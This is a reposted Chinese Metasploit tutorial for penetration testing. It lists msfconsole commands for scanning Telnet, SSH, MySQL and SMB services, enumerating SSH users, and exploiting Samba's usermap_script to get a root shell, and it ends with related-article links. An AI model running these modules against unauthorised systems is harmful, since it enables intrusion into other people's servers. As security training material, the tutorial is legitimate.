渗透测试专题二之msf(kali)的攻击教程将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统...
主要功能:
- msf console的使用及其配置
- msf的主要作用及其实例
主要功能介绍详情
- msf console的使用及其配置
启动服务:service postgresql start
如果先打开了msf的界面: msf > msfconsole
运行命令:msf> db_rebuild_cache #如果显示数据库为连接
则运行命令:db_connect #开启数据库的连接
也可以通过:db_status #查看数据库的连接状态
- msf的主要作用及其实例
- 攻击远程Telnet服务器
- telnet服务器简述:常用的远程控制Web服务器的方法
-
登录远程服务器需要:域名、用户名、密码
- msf攻击telnet服务器的过程
- module:telnet_version
- show option #查看相应的参数
- msf> use auxiliary/scanner/telnet/telnet_version
- show options #
- set [params required yes] #设置必填参数
- Login with XXXX/XXX to get started。#从这条信息中,可以获取到目标主机Telnet服务的用户名和密码。此时可以尝试登录。
- telnet -l xxxx [targetIP]
- 攻击SSH模块
- search scanner/ssh #搜索有效的SSH模块
- use auxiliary/scanner/ssh/ssh_enumusers normal SSH Username Enumeration
- show options
- exploit
- 扫描mysql服务器
- moudle:mysql_version
- msf>use auxiliary/scanner/mysql/mysql_version
- show options
- set [params required yes]
- exploit #渗透攻击
- 获取mysql的版本信息
- samb服务的攻击
- smb服务简介:将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统
- msf攻击smb服务器的一般步骤
- module:smb_version
- msf>use auxiliary/scanner/smb/smb_version
- show options
- set [params required yes] # set RHOSTS 192.168.1.0/24
- exploit # 启动扫描
- #查看扫描的信息 1、局域网内的正运行的samba服务器,及其操作系统类型
- search samba/usermap # 查看运行结果
- info [7中的usermap_scritp]
- set RVHOST
- exploit # 启动渗透攻击
- 从[10]中可以知道攻击是否成功,如果成功 则可以获取目标主机的一些信息(id #查看当前登录用户的一些信息 uid=0 #root gid =0 # root)
转载于:https://www.cnblogs.com/Erma/p/7281601.html
渗透测试专题二之msf(kali)的攻击教程将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统...相关推荐
- 渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
白嫖 :https://zhuanlan.zhihu.com/p/449836479 :http://t.zoukankan.com/hxlinux-p-15787814.html :https:// ...
- Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...
- 【渗透测试框架】Metasploit-Framework(MSF)安装与使用
文章目录 前言 一.Metasploit简介 二.Metasploit安装及更新 一键安装 更新Metasploit 三.Metasploit数据库连接 四.Metasploit模块介绍 Exploi ...
- Kali Linux Web 渗透测试秘籍 第一章 配置 Kali Linux
第一章 配置 Kali Linux 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 在第一章中,我们会涉及如何准备我们的 Kali 以 ...
- 网络渗透测试实验二(网络扫描与网络侦察)
实验目的:理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 系统环境:Kali Linux 2.Windows 网 ...
- CTF-Anubis HackTheBox 渗透测试(二)
大家好,我是你们好朋友小峰.预计从今天开始,陆陆续续为大家推出 CTF-Horizontall HackTheBox 系列文章. 0x01 简介 Anubis是由作者4ndr34z在Hac ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- 一次渗透测试引发Json格式下的CSRF攻击
0x00 前言 漏洞背景 hw时期在电信三巨头之一旗下的子公司出差,做一下渗透测试.公网的业务主挖逻辑漏洞,但是每次挖着挖着就变成了CSRF攻击,出差半个月算是把这辈子的CSRF都给挖完了. test ...
- APP渗透测试 网站漏洞检测以及如何防止攻击
很多公司都有着自己的APP,包括安卓端以及ios端都有属于自己的APP应用,随着互联网的快速发展,APP安全也影响着整个公司的业务发展,前段时间有客户的APP被攻击,数据被篡改,支付地址也被修改成攻击 ...
最新文章
- 不可不知的C#基础 1. -- Extension 扩展方法
- 蓝桥备赛第三周 倍增+贪心+素数+约数
- WebSocket——stomp连接错误[Whoops! Lost connection to XXX]解决方案
- c#完美截断字符串(中文+非中文)
- 云计算的概念 - 初识云计算知识专栏(1)
- java无穷大 inf_java – 为什么浮点数无穷大,不像NaN,等于?
- delphi idtcpclient 发送十六进制00_91413足球推荐分析 法甲 04:00 南特 VS 巴黎圣日尔曼...
- 你的第一杯Web 2.0 —— 快速浏览jQuery、Spring MVC和XStream/Jettison
- [tensorflow]tensorflow2.0的优化理论
- 实习成长之路——设计模式实战二:如何使用面向对象的思想设计一个功能需求?接口鉴权怎么用面向对象分析实现?
- 联想M7216NWA墨粉清零:
- st7789屏幕使用方法
- 【数学建模】2021 年全国大学生数学建模竞赛A题一等奖获奖论文
- 2018我们讲一下百度云BAE专业引擎的使用
- 修改服务器bi,修改 FineBI 配置参数
- prcs6汉化补丁怎么替换_最新 | EndNote X9.2授权版+汉化
- mysql添加用户并赋予权限命令
- php画五角星,H5怎样用绘制五角星
- markdown(md)编辑 全部格式
- 【SAP Hana】SAP HANA协同开发代码管理应用入门
热门文章
- 美封锁对华半导体出口:14nm制造可以 X86设计不行
- XWiki 6.3 M1 发布,Java 的 Wiki 系统
- 初学Python之利用map编写姓名格式化输出函数
- linux普通用户su root切换提示没有文件或目录
- Cocosd-x”设计模式“之五 :防御式编程”模式“
- python 如何调用另一个路径下py文件的函数
- 蓝桥杯 ADV-204 算法提高 快速幂
- 1025. 反转链表 (25)-浙大PAT乙级真题
- 配置Tomcat时server.xml和content.xml自动还原问题
- 20050405:什么都要会啊